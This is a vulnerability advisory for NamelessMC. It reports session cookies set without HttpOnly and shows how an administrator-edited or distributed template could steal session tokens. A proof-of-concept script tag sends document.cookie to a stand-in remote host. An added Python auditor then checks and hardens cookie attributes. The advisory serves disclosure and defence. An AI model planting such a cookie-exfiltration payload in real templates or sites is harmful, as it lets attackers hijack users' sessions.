Sensitive Cookie Without 'HttpOnly' Flag in namelessmc/nameless
Oct 23rd 2021
Due to a combination of factors in the design of the authentication and authorization system, together with missing protective cookie attributes, it is possible for a malicious user to exfiltrate session tokens from a NamelessMC instance and aggregate them on a remote service.
A malicious administrative user can use NamelessMC's built-in template system either to inject arbitrary JavaScript into a single instance, or to create and distribute a template that administrators of other instances may install.
This issue stems primarily from the HttpOnly flag not being set on cookies, and from insufficient validation of the session to ensure that it cannot be shared with another entity.
Proof of Concept
Edit the active template as an administrator, and add the following code to the
<script> fetch('https://example.com?referrer='+encodeURIComponent(window.location.href)+'&cookies='+document.cookie); </script>
Now, imagine someone creating a desirable template for the software and making it available for others to download. It would be trivial to hide such code within a template, and anyone who installs it on their instance would then send their cookie values over the wire to an attacker-controlled server. The maintainer of a popular existing template could likewise add the code in an update that others would then install.
Once tokens have been exfiltrated, this vulnerability allows a malicious actor to log in as any user whose session cookie was captured.
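The following is an added example, not code from NamelessMC or from the report above. It shows the check a practitioner would run against an instance's Set-Cookie headers (the weak shape that lets the template payload read the session via document.cookie, beside a hardened header built with Python's standard http.cookies module), and flags the missing HttpOnly, Secure and SameSite attributes. The cookie name "session" and its value are constructed for illustration and are not NamelessMC's actual cookie names.

```python
# Added example (not NamelessMC code): audit Set-Cookie headers for the
# attributes that limit what injected JavaScript can do with a session cookie,
# and build a hardened header for comparison. Cookie names and values below
# are constructed for illustration.
from http.cookies import SimpleCookie


def parse_set_cookie(header):
    """Split one Set-Cookie header into (cookie name, {attribute: value}).

    Attribute names are lower-cased; flag attributes such as HttpOnly map to True.
    """
    parts = [p.strip() for p in header.split(";")]
    name = parts[0].split("=", 1)[0].strip()
    attrs = {}
    for part in parts[1:]:
        if "=" in part:
            key, value = part.split("=", 1)
            attrs[key.strip().lower()] = value.strip()
        elif part:
            attrs[part.lower()] = True
    return name, attrs


def audit_set_cookie(header):
    """Return the list of weaknesses in a Set-Cookie header (empty if hardened)."""
    name, attrs = parse_set_cookie(header)
    findings = []
    if "httponly" not in attrs:
        findings.append(f"{name}: missing HttpOnly, readable via document.cookie")
    if "secure" not in attrs:
        findings.append(f"{name}: missing Secure, sent over plaintext HTTP")
    samesite = attrs.get("samesite")
    if not isinstance(samesite, str) or samesite.lower() not in ("lax", "strict"):
        findings.append(f"{name}: SameSite not Lax or Strict, sent on cross-site requests")
    return findings


def hardened_set_cookie(name, value):
    """Build a Set-Cookie header for a session cookie with the protective attributes set."""
    cookie = SimpleCookie()
    cookie[name] = value
    morsel = cookie[name]
    morsel["httponly"] = True   # not exposed to document.cookie
    morsel["secure"] = True     # only sent over HTTPS
    morsel["samesite"] = "Lax"  # not attached to cross-site POSTs
    morsel["path"] = "/"
    return morsel.OutputString()


# Constructed sample: a session cookie set without any protective attributes,
# which is the shape that lets the template payload above read it.
WEAK_HEADER = "session=2f9c0c1e7b4d; Path=/"

if __name__ == "__main__":
    for finding in audit_set_cookie(WEAK_HEADER):
        print("weak:", finding)
    fixed = hardened_set_cookie("session", "2f9c0c1e7b4d")
    print("hardened:", fixed)
    print("findings after hardening:", audit_set_cookie(fixed))
```

To check a live instance, paste each Set-Cookie line from `curl -sI https://<host>/` into audit_set_cookie. Note the caveat: HttpOnly only stops the script from reading the cookie value; a payload running in an administrator's browser can still issue requests that carry the victim's session, so the template-injection path and the session validation point raised above need addressing as well.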